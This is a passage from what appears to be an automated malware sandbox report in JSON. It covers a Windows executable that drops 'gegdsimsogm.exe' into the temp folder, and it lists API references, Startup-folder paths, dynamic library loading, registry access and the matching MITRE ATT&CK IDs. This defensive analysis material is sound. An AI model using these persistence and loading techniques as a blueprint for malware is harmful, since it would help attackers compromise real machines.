esp,mov\tdword ptr [esi], edi,push\tesi,call\tdword ptr [0x407074],mov\tecx, dword ptr [esi + 0x10],mov\tdword ptr [0x46f3c0], ecx,mov\teax, dword ptr [esi + 4],mov\tdword ptr [0x46f3cc], eax,mov\tedx, dword ptr [esi + 8],mov\tdword ptr [0x46f3d0], edx,mov\tesi, dword ptr [esi + 0xc],and\tesi, 0x7fff,mov\tdword ptr [0x46f3c4], esi,cmp\tecx, 2,je\t0x4028c5,or\tesi, 0x8000,mov\tdword ptr [0x46f3c4], esi,shl\teax, 8,\"\n \"gegdsimsogm.exe\" file has an entrypoint instructions - \"push\t0x60,push\t0x42b7f0,call\t0x42213c,mov\tedi, 0x94,mov\teax, edi,call\t0x421ba0,mov\tdword ptr [ebp - 0x18], esp,mov\tesi, esp,mov\tdword ptr [esi], edi,push\tesi,call\tdword ptr [0x42a080],mov\tecx, dword ptr [esi + 0x10],mov\tdword ptr [0x463b20], ecx,mov\teax, dword ptr [esi + 4],mov\tdword ptr [0x463b2c], eax,mov\tedx, dword ptr [esi + 8],mov\tdword ptr [0x463b30], edx,mov\tesi, dword ptr [esi + 0xc],and\tesi, 0x7fff,mov\tdword ptr [0x463b24], esi,cmp\tecx, 2,je\t0x4229a3,or\tesi, 0x8000,mov\tdword ptr [0x463b24], esi,shl\teax, 8,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4f876@RPCRT4.dll\"\n \"15001600c03e6069@ADVAPI32.dll\"\n \"0e000f00703f6069@ADVAPI32.dll\"\n \"0e000f00cc3f6069@ADVAPI32.dll\"\n \"11001200b4476069@ADVAPI32.dll\"\n \"1100120048486069@ADVAPI32.dll\"\n \"120013008c486069@ADVAPI32.dll\"\n \"12001300e4486069@ADVAPI32.dll\"\n \"14001500386e6069@ADVAPI32.dll\"\n \"14001500506e6069@ADVAPI32.dll\"\n \"14001500686e6069@ADVAPI32.dll\"\n \"17001800806e6069@ADVAPI32.dll\"\n \"0d000e00986e6069@ADVAPI32.dll\"\n \"11001200a86e6069@ADVAPI32.dll\"\n \"11001200bc6e6069@ADVAPI32.dll\"\n \"0d000e0034496069@SHELL32.dll\"\n \"0d000e00b0496069@SHELL32.dll\"\n \"0f001000fc6f6069@ADVAPI32.dll\"\n \"140015003c706069@ADVAPI32.dll\"\n \"1400150054706069@ADVAPI32.dll\"\n \"0c000d009c706069@ADVAPI32.dll\"\n \"0c000d00ac706069@ADVAPI32.dll\"\n \"0e000f00bc706069@ADVAPI32.dll\"\n \"0e000f00cc706069@ADVAPI32.dll\"\n \"0b000c00dc706069@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" has an executable section named \".text\"\n \"gegdsimsogm.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" has an writable section named \".data\"\n \"gegdsimsogm.exe\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-322", "type": 2, "relevance": 1, "name": "Contains ability to move file or directory (API string)", "description": "Found reference to API \"MoveFileA\" (Indicator: \"MoveFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"MoveFileA\" (Indicator: \"MoveFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-265", "type": 2, "relevance": 1, "name": "Contains reference to Windows Startup folder", "description": "\"C:\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005952.00000003.75415.001C0000.00000004.mdmp\n 00000000-00005952.00000003.75415.004F0000.00000002.mdmp\n \":\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005952.00000003.75415.001C0000.00000004.mdmp\n \":\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005952.00000003.75415.001C0000.00000004.mdmp\n \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005952.00000003.75415.001C0000.00000004.mdmp\n 00000000-00005952.00000003.75415.004F0000.00000002.mdmp", "origin": "File/Memory", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72130000\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" loaded module \"KERNEL32\" at base 76e70000\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69570000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005952)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77950000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"gegdsimsogm.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: gegdsimsogm.exe)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-189", "type": 2, "relevance": 3, "name": "Contains ability to reboot/shutdown the operating system (API string)", "description": "Found reference to API \"NtShutdownSystem\" (Indicator: \"ShutdownSystem\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" was detected as \"Microsoft visual C++ 7.0\"\n \"gegdsimsogm.exe\" was detected as \"Microsoft visual C++ 7.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00005952]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"c:\\cbwvqpkjed0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL 